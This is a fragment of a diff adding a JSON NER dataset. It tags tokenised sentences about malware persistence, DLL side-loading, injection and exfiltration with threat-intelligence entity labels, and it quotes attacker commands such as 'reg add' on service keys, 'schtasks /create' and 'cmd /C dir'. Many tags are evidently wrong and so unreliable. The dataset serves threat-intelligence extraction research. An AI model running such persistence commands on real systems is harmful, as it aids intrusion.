"ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "creating", + "the", + "files", + "and", + "registry", + "keys" + ], + "ner_tags": [ + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "2001Path", + "to", + "the", + "registry", + "key", + "for", + "the", + "PrintProcessor", + "service" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "paths", + "and", + "registry", + "keys", + "to", + "use" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "it", + "can", + "create", + "a", + "service" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "service", + "is", + "then", + "created" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "can", + "be", + "configured", + "to", + "create", + "a", + "service", + "for", + "persistence." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "it", + "can", + "create", + "a", + "service", + "or", + "scheduled", + "task." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "persistence", + "is", + "established", + "by", + "using", + "the", + "ITaskService", + "COM", + "interface", + "to", + "create", + "the", + "\\Microsoft\\Windows\\CertificateServicesClient\\NetTask", + "scheduled", + "task" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "task", + "will", + "run", + "the", + "DLL", + "hijacking", + "target", + "as", + "SYSTEM", + "at", + "each", + "boot." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "uses", + "COM", + "interfaces", + "to", + "schedule", + "tasks" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "creates", + "a", + "scheduled", + "task", + "for", + "persistence." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "service", + "was", + "configured", + "to", + "execute", + "the", + "next", + "step", + "of", + "the", + "installation", + "process", + "by", + "running", + "a", + "legitimate", + "application" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "service", + "is", + "then", + "created", + "to", + "run", + "that", + "module", + "and", + "is", + "immediately", + "started" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "target", + "for", + "DLL", + "side-loading" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "DLL", + "side-loading" + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam" + ] + }, + { + "tokens": [ + "the", + "malicious", + "library", + "is", + "the", + "same", + "and", + "serves", + "to", + "load", + "and", + "execute", + "shellcode", + "from", + "a", + "file", + "that", + "is", + "stored", + "under", + "the", + "same", + "name", + "as", + "the", + "DLL" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "new", + "process", + "loads", + "the", + "decoy", + "DLL", + "and", + "manually", + "replaces", + "its", + "content", + "in", + "memory", + "with", + "the", + "fcClientDll", + "module", + "(a", + "process", + "known", + "as", + "module", + "stomping", + "or", + "DLL", + "hollowing)," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "uses", + "DLL", + "Side-Loading", + "to", + "launch", + "its", + "second-stage", + "dropper." + ], + "ner_tags": [ + "O", + "B-Way", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "If", + "a", + "task", + "with", + "the", + "same", + "name", + "already", + "exists,", + "it", + "is", + "deleted", + "before", + "the", + "new", + "one", + "is", + "created" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "After", + "hijacking", + "the", + "aforementioned", + "drivers,", + "the", + "rootkit", + "erases", + "the", + "DLL", + "names", + "associated", + "with", + "them", + "from", + "internal", + "structures", + "used", + "to", + "display", + "device", + "drivers." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Covers", + "its", + "tracks", + "by", + "overwriting", + "the", + "code", + "previously", + "modified", + "by", + "the", + "malicious", + "library", + "with", + "a", + "useless", + "call", + "to", + "lstrlenW." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "removing", + "their", + "entries", + "from", + "the", + "ActiveProcessLinks", + "list", + "of", + "the", + "undocumented", + "KPROCESS", + "kernel", + "structure." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "file", + "is", + "then", + "deleted", + "from", + "the", + "disk" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "deletes", + "its", + "rootkit’s", + "executable", + "after", + "launching", + "it." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "then", + "starts", + "a", + "suspended", + "process", + "to", + "perform", + "injection", + "on", + "it." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "stores", + "collected", + "data", + "in", + "local", + "SQLite", + "databases", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Each", + "manager", + "stores", + "collected", + "data", + "in", + "its", + "own", + "SQLite", + "database,", + "while", + "data", + "that", + "is", + "collected", + "on", + "demand", + "is", + "returned", + "directly", + "to", + "the", + "C&C", + "server" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "uses", + "local", + "caches", + "to", + "stage", + "data" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "data", + "can", + "be", + "collected", + "locally", + "by", + "the", + "corresponding", + "class", + "before", + "it", + "is", + "staged", + "for", + "exfiltration." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "can", + "exfiltrate", + "files", + "from", + "local", + "file", + "systems." + ], + "ner_tags": [ + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "corresponding", + "files", + "are", + "collected" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Monitoring", + "file", + "system", + "events", + "to", + "collect", + "new", + "and", + "modified", + "files." + ], + "ner_tags": [ + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "can", + "search", + "through", + "connected", + "file", + "systems", + "and", + "obtain", + "directory", + "listings." + ], + "ner_tags": [ + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "walks", + "through", + "all", + "mapped", + "file", + "systems", + "and", + "collects", + "files" + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features" + ] + }, + { + "tokens": [ + "collects", + "file", + "and", + "directory", + "metadata" + ], + "ner_tags": [ + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "uses", + "malicious", + "RTF", + "and", + "DOCX", + "attachments", + "to", + "compromise", + "victims." + ], + "ner_tags": [ + "O", + "O", + "B-Tool", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "sending", + "spearphishing", + "emails", + "with", + "malicious", + "attachments", + "such", + "as", + "RTF", + "documents", + "created", + "via", + "the", + "Royal", + "Road", + "builder" + ], + "ner_tags": [ + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "makes", + "extensive", + "use", + "of", + "the", + "Windows", + "API", + "to", + "execute", + "commands", + "and", + "launch", + "processes." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "performs", + "the", + "functions", + "of", + "LoadLibrary", + "and", + "calls", + "the", + "loaded", + "module’s", + "startModule", + "export." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "used", + "for", + "function", + "imports", + "(via", + "GetProcAddress)" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "perform", + "WMI", + "queries" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "uses", + "WMI", + "for", + "lateral", + "movement", + "and", + "information", + "gathering." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "runs", + "WMI", + "queries", + "every", + "second", + "to", + "get", + "all", + "process", + "creation", + "and", + "termination", + "events." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "lateral", + "movement", + "scripts", + "such", + "as", + "WMIExec." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "use", + "locally", + "configured", + "proxies." + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "can", + "use", + "XOR,", + "TEA,", + "RC4", + "and", + "a", + "modified", + "AES", + "algorithm", + "to", + "encrypt", + "traffic", + "and", + "files." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "It", + "is", + "encrypted", + "using", + "the", + "AES", + "algorithm" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "The", + "application", + "and", + "the", + "accompanying", + "relevant", + "and", + "malicious", + "DLL", + "were", + "both", + "embedded", + "in", + "the", + "loader’s", + "resources." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "embedded", + "DLL" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "embedded", + "DLL" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "also", + "embeds", + "a", + "DLL", + "version", + "of", + "the", + "Pafish", + "(aka", + "Paranoid", + "Fish)", + "sandbox", + "and", + "analysis", + "detection", + "tool", + "as", + "one", + "of", + "its", + "encrypted", + "resources" + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "module", + "is", + "embedded", + "in", + "the", + "library’s", + "resource", + "section", + "and", + "encrypted", + "with", + "an", + "algorithm", + "similar", + "to", + "RC4" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "function", + "used", + "to", + "encrypt", + "and", + "decrypt", + "the", + "embedded", + "module" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Another", + "component", + "collects", + "information", + "about", + "mapped", + "volumes,", + "including", + "mount", + "point,", + "name,", + "drive", + "type,", + "and", + "disk", + "usage", + "data." + ], + "ner_tags": [ + "O", + "O", + "I-Features", + "I-Features", + "O", + "I-Features", + "O", + "O", + "I-Features", + "O", + "B-Features", + "I-Features", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "This", + "is", + "sent", + "to", + "the", + "server", + "along", + "with", + "the", + "computer’s", + "name" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "includes", + "bidirectional", + "file", + "transfers", + "between", + "the", + "C&C", + "and", + "the", + "compromised", + "machine." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "configuration", + "corresponds", + "to", + "resource", + "1000", + "in", + "the", + "initial", + "loader.", + "It", + "defines", + "the", + "address", + "and", + "port", + "for", + "both", + "the", + "exfiltration", + "server", + "(file_server)", + "and", + "the", + "C&C", + "server" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "given", + "command", + "line." + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "is", + "protected", + "with", + "DNGuard,", + "a", + "commercial", + ".NET", + "packer." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "uses", + "both", + "regular", + "and", + "reflective", + "DLL", + "injection." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way" + ] + }, + { + "tokens": [ + "proxy/tunneling", + "utilities", + "(HTran,", + "LCX,", + "EarthWorm" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-Org", + "B-Org" + ] + }, + { + "tokens": [ + "read", + "from", + "a", + "file", + "on", + "disk", + "or", + "a", + "registry", + "key." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "components", + "use", + "registry", + "keys", + "to", + "signal", + "each", + "other." + ], + "ner_tags": [ + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "it", + "collects", + "usernames" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "usernames" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "directory", + "listings" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "directory", + "listings", + "were", + "harvested", + "as", + "a", + "result." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "hostnames" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "machine", + "names" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "execution", + "using", + "scheduled", + "tasks" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "downloaded", + "and", + "run", + "by", + "the", + "plaintext", + "PY", + "files", + "from", + "external", + "infrastructure." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "it", + "download", + "and", + "execute", + "yet", + "another", + "Python", + "script" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Code", + "responsible", + "for", + "downloading", + "cron_script", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile" + ] + }, + { + "tokens": [ + "keylogging", + "functionality." + ], + "ner_tags": [ + "B-Way", + "O" + ] + }, + { + "tokens": [ + "malware", + "hidden", + "inside", + "the", + "Python", + "compiled", + "byte", + "code" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "malicious", + "code", + "is", + "embedded", + "in", + "code" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "unpacking" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "Obfuscation", + "is", + "one", + "of", + "the", + "most", + "popular", + "methods", + "to", + "achieve", + "this." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "JavaScript", + "obfuscation", + "was", + "used" + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "use", + "of", + "various", + "obfuscation", + "techniques", + "in", + "malware" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "most", + "popular", + "obfuscation", + "techniques", + "is", + "execution", + "of", + "Base64-encoded", + "malicious", + "code" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "use", + "of", + "W4SP", + "crew", + "obfuscation", + "tools", + "such", + "as", + "Hyperion", + "and", + "Kramer" + ], + "ner_tags": [ + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "The", + "inspected", + "UEFI", + "firmware", + "was", + "tampered", + "with", + "to", + "embed", + "a", + "malicious", + "code", + "that", + "we", + "dub", + "MoonBounce;" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "be", + "embedded", + "in", + "the", + "loader", + "itself." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "that", + "stages", + "execution", + "of", + "further", + "payloads", + "downloaded", + "from", + "the", + "internet" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "attempts", + "to", + "fetch", + "another", + "stage", + "of", + "the", + "payload", + "to", + "run", + "in", + "memory," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "stage", + "the", + "execution", + "of", + "additional", + "plugins", + "in", + "memory," + ], + "ner_tags": [ + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Download", + "a", + "file", + "from", + "the", + "C2", + "server" + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "reaching", + "out", + "to", + "the", + "server", + "to", + "obtain", + "a", + "further", + "payload." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "execution", + "of", + "several", + "functions", + "in", + "the", + "EFI", + "Boot", + "Services", + "Table,", + "namely", + "AllocatePool,", + "CreateEventEx", + "and", + "ExitBootServices" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "using", + "the", + "WinExec", + "API" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "injecting", + "it", + "into", + "an", + "svchost.exe", + "process," + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "injecting", + "it", + "to", + "the", + "address", + "space", + "of", + "another", + "process." + ], + "ner_tags": [ + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "injected", + "process" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "an", + "encrypted", + "blob" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "encrypted", + "ScrambleCross", + "shellcode" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "an", + "encrypted", + "configuration", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "facilitates", + "the", + "functionality", + "of", + "WMI", + "in", + "Windows" + ], + "ner_tags": [ + "B-Features", + "O", + "B-Features", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "when", + "the", + "WMI", + "service", + "was", + "initiated" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "upon", + "initiation", + "of", + "the", + "WMI", + "service" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Usage", + "of", + "WMI", + "for", + "remote", + "command", + "execution" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "wmic", + "/node:<" + ], + "ner_tags": [ + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "It", + "works", + "by", + "decrypting", + "a", + "shellcode", + "BLOB", + "with", + "AES-256" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "through", + "the", + "command", + "line", + "as" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "via", + "a", + "Windows", + "batch", + "script", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "issuing", + "the", + "following", + "command", + "line" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Write", + "text", + "to", + "a", + "given", + "*.bat", + "file", + "and", + "execute", + "it" + ], + "ner_tags": [ + "B-Way", + "B-Features", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Run", + "a", + "shell", + "command" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "examples", + "of", + "command", + "lines" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "cmd", + "/C" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "cmd", + "/C" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "cmd", + "/C" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "cmd", + "/C" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "cmd", + "/C" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "cmd", + "/C" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "cmd", + "/C" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "cmd", + "/C" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "cmd", + "/C" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "cmd", + "/C" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "cmd", + "/C" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "cmd", + "/C" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "cmd", + "/C" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "cmd", + "/C" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "cmd", + "/C" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "cmd", + "/C" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "cmd", + "/C" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "cmd", + "/C" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "cmd", + "/C" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "cmd", + "/C" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "executing", + "a", + "launcher", + "utility", + "with", + "the", + "filename", + "System.Mail.Service.dll", + "(MD5:", + "5F9020983A61446A77AF1976247C443D)", + "through", + "the", + "command", + "line", + "as", + "a", + "service." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "reg", + "add", + "\"HKLM\\SOFTWARE\\Microsoft\\Windows", + "NT\\CurrentVersion\\Svchost\"" + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "reg", + "add", + "\"HKLM\\SYSTEM\\CurrentControlSet\\Services\\iscsiwmi\\Parameters\"" + ], + "ner_tags": [ + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "reg", + "add", + "\"HKLM\\SYSTEM\\CurrentControlSet\\Services\\iscsiwmi\\Parameters\"", + "/" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "The", + "second", + "way", + "to", + "execute", + "StealthMutant", + "is", + "through", + "the", + "creation", + "of", + "a", + "scheduled", + "task" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "schtasks", + "/create", + "/TN" + ], + "ner_tags": [ + "B-Way", + "B-Way", + "B-Way" + ] + }, + { + "tokens": [ + "schtasks", + "/run" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "Both", + "the", + "IP", + "and", + "the", + "server", + "directory", + "path", + "are", + "encrypted", + "with", + "AES-128", + "using", + "a", + "base64", + "encoded", + "key", + "stored", + "in", + "the", + "backdoor’s", + "image." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "commands", + "retrieved", + "from", + "the", + "server", + "are", + "also", + "encrypted", + "with", + "AES-128" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "Get", + "list", + "of", + "drives" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Get", + "content", + "list", + "from", + "a", + "specified", + "directory" + ], + "ner_tags": [ + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "cmd", + "/C", + "\"C:", + "&", + "cd", + "\\", + "&", + "dir", + "$temp\\", + "/od\"" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sending", + "back", + "the", + "result", + "of", + "the", + "command’s", + "execution", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + 